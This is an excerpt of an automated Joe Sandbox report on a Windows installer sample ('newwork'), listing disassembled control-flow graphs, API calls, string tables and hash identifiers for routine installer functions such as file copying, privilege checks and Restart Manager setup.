                                                                                        • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                        • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                        • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                        • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                        • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                        • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                        • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                        • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                        • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                        • Stripped read-only attribute., xrefs: 00470EC7
                                                                                        • Version of our file: (none), xrefs: 00470AFC
                                                                                        • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                        • Installing into GAC, xrefs: 00471714
                                                                                        • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                        • Will register the file (a type library) later., xrefs: 00471513
                                                                                        • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                        • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                        • API String ID: 0-4021121268
                                                                                        • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                        • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                        • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                        • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                        • API String ID: 2252812187-1888249752
                                                                                        • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                        • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmStartSession), ref: 00450309
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmRegisterResources), ref: 0045031E
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmGetList), ref: 00450333
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmShutdown), ref: 00450348
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmRestart), ref: 0045035D
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmEndSession), ref: 00450372
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                        • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                        • API String ID: 1968650500-3419246398
                                                                                        • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                        • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1827 423c63-423c6b 1794->1827 1828 423c70-423c72 1794->1828 1800 423cf3 1797->1800 1801 423d27-423d2c 1797->1801 1802 423c93-423c96 1798->1802 1803 423d50-423d60 1798->1803 1804 423fb1-423fb9 1800->1804 1805 423cf9-423d01 1800->1805 1808 423d32-423d35 1801->1808 1809 42409a-4240a8 IsIconic 1801->1809 1806 423cc5-423cc8 1802->1806 1807 423c98 1802->1807 1810 423d62-423d67 1803->1810 1811 423d6b-423d73 call 424194 1803->1811 1816 424152-42415a 1804->1816 1822 423fbf-423fca call 4181e0 1804->1822 1814 423f13-423f3a SendMessageA 1805->1814 1815 423d07-423d0c 1805->1815 1823 423da9-423db0 1806->1823 1824 423cce-423ccf 1806->1824 1818 423df6-423e06 call 423b84 1807->1818 1819 423c9e-423ca1 1807->1819 1820 4240d6-4240eb call 424850 1808->1820 1821 423d3b-423d3c 1808->1821 1809->1816 1817 4240ae-4240b9 GetFocus 1809->1817 1825 423d78-423d80 call 4241dc 1810->1825 1826 423d69-423d8c call 423b84 1810->1826 1811->1816 1814->1816 1829 423d12-423d13 1815->1829 1830 42404a-424055 1815->1830 1831 424171-424177 1816->1831 1817->1816 1838 4240bf-4240c8 call 41eff4 1817->1838 1818->1816 1839 423ca7-423caa 1819->1839 1840 423e1e-423e3a PostMessageA call 423b84 1819->1840 1820->1816 1833 423d42-423d45 1821->1833 1834 4240ed-4240f4 1821->1834 1822->1816 1866 423fd0-423fdf call 4181e0 IsWindowEnabled 1822->1866 1823->1816 1843 423db6-423dbd 1823->1843 1844 423cd5-423cd8 1824->1844 1845 423f3f-423f46 1824->1845 1825->1816 1826->1816 1827->1831 1828->1792 1828->1794 1846 424072-42407d 1829->1846 1847 423d19-423d1c 1829->1847 1830->1816 1849 42405b-42406d 1830->1849 1850 424120-424127 1833->1850 1851 423d4b 1833->1851 1860 4240f6-424109 call 4244d4 1834->1860 1861 42410b-42411e call 42452c 1834->1861 1838->1816 1898 4240ce-4240d4 SetFocus 1838->1898 1857 423cb0-423cb3 1839->1857 1858 423ea5-423eac 1839->1858 1840->1816 1843->1816 1863 423dc3-423dc9 1843->1863 1864 423cde-423ce1 1844->1864 1865 423e3f-423e5f call 423b84 1844->1865 1845->1816 1853 423f4c-423f51 call 404e54 1845->1853 1846->1816 1875 424083-424095 1846->1875 1872 423d22 1847->1872 1873 423f56-423f5e 1847->1873 1849->1816 1870 42413a-424149 1850->1870 1871 424129-424138 1850->1871 1874 42414b-42414c call 423b84 1851->1874 1853->1816 1881 423cb9-423cba 1857->1881 1882 423dce-423ddc IsIconic 1857->1882 1883 423eae-423ec1 call 423b14 1858->1883 1884 423edf-423ef0 call 423b84 1858->1884 1860->1816 1861->1816 1863->1816 1867 423ce7 1864->1867 1868 423e0b-423e19 call 424178 1864->1868 1911 423e83-423ea0 call 423a84 PostMessageA 1865->1911 1912 423e61-423e7e call 423b14 PostMessageA 1865->1912 1866->1816 1915 423fe5-423ff4 call 4181e0 IsWindowVisible 1866->1915 1867->1874 1868->1816 1870->1816 1871->1816 1872->1874 1873->1816 1896 423f64-423f6b 1873->1896 1907 424151 1874->1907 1875->1816 1899 423cc0 1881->1899 1900 423d91-423d99 1881->1900 1889 423dea-423df1 call 423b84 1882->1889 1890 423dde-423de5 call 423bc0 1882->1890 1924 423ed3-423eda call 423b84 1883->1924 1925 423ec3-423ecd call 41ef58 1883->1925 1918 423ef2-423ef8 call 41eea4 1884->1918 1919 423f06-423f0e call 423a84 1884->1919 1889->1816 1890->1816 1896->1816 1910 423f71-423f80 call 4181e0 IsWindowEnabled 1896->1910 1898->1816 1899->1874 1900->1816 1913 423d9f-423da4 call 422c4c 1900->1913 1907->1816 1910->1816 1940 423f86-423f9c call 412310 1910->1940 1911->1816 1912->1816 1913->1816 1915->1816 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1915->1941 1938 423efd-423f00 1918->1938 1919->1816 1924->1816 1925->1924 1938->1919 1940->1816 1946 423fa2-423fac 1940->1946 1941->1816 1946->1816
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                        • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2188->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2188->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2328 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2328 2321->2328 2347 467bb6-467bd1 2328->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2328->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2430 467f40-467f53 call 4145fc 2428->2430 2431 467f3d 2428->2431 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2430->2429 2431->2430 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2534 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2534 2535 4683d1-4683ee call 44ffdc call 450138 2532->2535 2549 468453 2534->2549 2550 46843b-468442 2534->2550 2535->2534 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2556 46846f-468478 2554->2556 2557 46847a-46847c 2554->2557 2558 468480-46849a 2555->2558 2556->2555 2556->2557 2557->2558 2559 468543-46854a 2558->2559 2560 4684a0-4684a9 2558->2560 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2583 468584-468598 call 403494 2563->2583 2584 468575-468582 call 47c440 2563->2584 2570 4685f0-4685f9 2564->2570 2574 4685ff-468617 call 429fd8 2570->2574 2575 468709-468738 call 42b96c call 44e83c 2570->2575 2592 46868e-468692 2574->2592 2593 468619-46861d 2574->2593 2609 4687e6-4687ea 2575->2609 2610 46873e-468742 2575->2610 2605 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2583->2605 2606 46859a-4685a5 call 403494 2583->2606 2584->2605 2598 468694-46869d 2592->2598 2599 4686e2-4686e6 2592->2599 2600 46861f-468659 call 40b24c call 47c26c 2593->2600 2598->2599 2607 46869f-4686aa 2598->2607 2603 4686fa-468704 call 42a05c 2599->2603 2604 4686e8-4686f8 call 42a05c 2599->2604 2660 46865b-468662 2600->2660 2661 468688-46868c 2600->2661 2603->2575 2604->2575 2605->2570 2606->2605 2607->2599 2619 4686ac-4686b0 2607->2619 2612 4687ec-4687f3 2609->2612 2613 468869-46886d 2609->2613 2611 468744-468756 call 40b24c 2610->2611 2639 468788-4687bf call 47c26c call 44cb0c 2611->2639 2640 468758-468786 call 47c26c call 44cbdc 2611->2640 2612->2613 2622 4687f5-4687fc 2612->2622 2623 4688d6-4688df 2613->2623 2624 46886f-468886 call 40b24c 2613->2624 2628 4686b2-4686d5 call 40b24c call 406ac4 2619->2628 2622->2613 2633 4687fe-468809 2622->2633 2631 4688e1-4688f9 call 40b24c call 4699fc 2623->2631 2632 4688fe-468913 call 466ee0 call 466c5c 2623->2632 2654 4688c6-4688d4 call 4699fc 2624->2654 2655 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2624->2655 2671 4686d7-4686da 2628->2671 2672 4686dc-4686e0 2628->2672 2631->2632 2685 468965-46896f call 414a44 2632->2685 2686 468915-468938 call 42a040 call 40b24c 2632->2686 2633->2632 2642 46880f-468813 2633->2642 2687 4687c4-4687c8 2639->2687 2640->2687 2653 468815-46882b call 40b24c 2642->2653 2682 46885e-468862 2653->2682 2683 46882d-468859 call 42a05c call 4699fc call 46989c 2653->2683 2654->2632 2655->2632 2660->2661 2673 468664-468676 call 406ac4 2660->2673 2661->2592 2661->2600 2671->2599 2672->2599 2672->2628 2673->2661 2696 468678-468682 2673->2696 2682->2653 2688 468864 2682->2688 2683->2632 2697 468974-468993 call 414a44 2685->2697 2711 468943-468952 call 414a44 2686->2711 2712 46893a-468941 2686->2712 2694 4687d3-4687d5 2687->2694 2695 4687ca-4687d1 2687->2695 2688->2632 2701 4687dc-4687e0 2694->2701 2695->2694 2695->2701 2696->2661 2702 468684 2696->2702 2713 468995-4689b8 call 42a040 call 469b5c 2697->2713 2714 4689bd-4689e0 call 47c26c call 403450 2697->2714 2701->2609 2701->2611 2702->2661 2711->2697 2712->2711 2717 468954-468963 call 414a44 2712->2717 2713->2714 2730 4689e2-4689eb 2714->2730 2731 4689fc-468a05 2714->2731 2717->2697 2730->2731 2732 4689ed-4689fa call 47c440 2730->2732 2733 468a07-468a19 call 403684 2731->2733 2734 468a1b-468a2b call 403494 2731->2734 2741 468a3d-468a54 call 414b18 2732->2741 2733->2734 2742 468a2d-468a38 call 403494 2733->2742 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2748 468a5f-468a68 2746->2748 2749 468a6a-468a74 call 42b0e4 2746->2749 2753 468a99-468abe call 403400 * 3 2747->2753 2748->2749 2751 468a79-468a88 call 414a44 2748->2751 2749->2751 2751->2753
                                                                                        APIs
                                                                                          • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                        • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                          • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                          • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                          • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                          • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                          • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                          • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                          • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                          • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                          • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                        • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021BFBEC,021C194C,?,?,021C197C,?,?,021C19CC,?), ref: 004683FD
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                          • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                        • String ID: $(Default)$STOPIMAGE$%H
                                                                                        • API String ID: 3231140908-2624782221
                                                                                        • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                        • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                        • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID: unins$unins???.*
                                                                                        • API String ID: 3541575487-1009660736
                                                                                        • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
